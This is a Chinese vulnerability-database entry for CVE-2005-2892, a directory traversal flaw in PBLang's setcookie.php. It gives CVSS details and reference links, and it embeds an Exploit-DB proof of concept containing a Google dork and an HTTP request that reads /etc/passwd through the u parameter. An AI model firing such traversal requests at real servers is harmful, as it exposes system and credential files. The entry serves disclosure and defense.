CVE-2005-2892
CVSS5.0
发布时间 :2005-09-14 16:03:00
修订时间 :2016-10-17 23:31:20
NMCOE    

[原文]Directory traversal vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) in the u parameter.


[CNNVD]PBLang SetCookie.PHP目录遍历漏洞(CNNVD-200509-132)

        PBLang是一个基于PHP支持国际化的BBS系统。它不需要任何数据库,数据全部存储在文件系统中。
        PBLang 4.65以及之前较早版本的setcookie.php中含有目录遍历漏洞,远程攻击者可以通过U参数中的".."(参数中包含'..')序列和"%00"(空字节后缀)来读取任意的文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2892
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2892
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-132
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112611338417979&w=2
(UNKNOWN)  BUGTRAQ  20050907 PBLang 4.65 (possibly prior versions) remote code execution / administrative credentials disclosure / system information disclosure / cross site scripting / path disclosure
http://securitytracker.com/alerts/2005/Sep/1014861.html
(VENDOR_ADVISORY)  SECTRACK  1014861
http://www.securityfocus.com/bid/14765
(UNKNOWN)  BID  14765
http://xforce.iss.net/xforce/xfdb/22185
(UNKNOWN)  XF  pblang-directory-traversal(22185)

- 漏洞信息

PBLang SetCookie.PHP目录遍历漏洞
中危 路径遍历
2005-09-14 00:00:00 2005-10-20 00:00:00
远程  
        PBLang是一个基于PHP支持国际化的BBS系统。它不需要任何数据库,数据全部存储在文件系统中。
        PBLang 4.65以及之前较早版本的setcookie.php中含有目录遍历漏洞,远程攻击者可以通过U参数中的".."(参数中包含'..')序列和"%00"(空字节后缀)来读取任意的文件。

- 公告与补丁

        暂无数据

- 漏洞信息 (18590)

PBLang local file include vulnerability (EDBID:18590)
php webapps
2012-03-13 Not Verified
0 Number 7
[点击下载] [点击下载]
||\\      || ||       || |-\\          //-|  ____      ________           __________  
|| \\     || ||       || | |\\        //| | |     \   |  ______|         |_______/ /
||  \\    || ||       || | | \\      // | | |  _   \  | |                       / /
||   \\   || ||       || | |  \\    //  | | | |_)  |  | |______    /\`'__\     / /
||    \\  || ||       || | |   \\  //   | | |  _  <   |  ______|   \ \ \/     / /
||     \\ || ||_______|| | |    \\//    | | | |_)  |  | |______     \ \_\    / /
||      \\|| |_________| |_|            |_| |_____/   |________|     \/_/   /_/
______________________________________________________________________________________
# Exploit Title:  [PBLang local file include vulnerability]
# Google Dork:    ["Software PBLang 4.67.16.a"]
# Date:           [12/03/2012]
# Author:         ~Pseudo:  [Number 7];
                  ~ Twitter:[@TunisianSeven];
                  ~ Blog:   [http://tunisianseven.blogspot.com/]
# Software Link:  [http://garr.dl.sourceforge.net/project/pblang/Full%20versions/PBLang%204.67.16.a%20no%20graphics/PBLang-4.67.16.a-nographics.zip]
# Version:        [4.67.16.a]
# Tested on:      [wINDOWS,Linux]
______________________________________________________________________________________
Proof of concept:
In setcookie.php
include($dbpath."/members/".$u);

In order to successfully perform this attack the attacker must have
the full path where the files are uploaded, and it is easy to get
making a request like this:

GET http://localhost/path/setcookie.php?u=../../../../../etc/passwd HTTP/1.1
Cookie: eXtplorer=eRlQPZSWiGt2zRpFlXr6qCgja6DiLumU
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

For requests like this i use acunetix :D
______________________________________________________________________________________		

- 漏洞信息

19269
PBLang setcookie.php u Parameter Traversal Arbitrary File Access
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2005-09-06 Unknow
2005-09-06 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站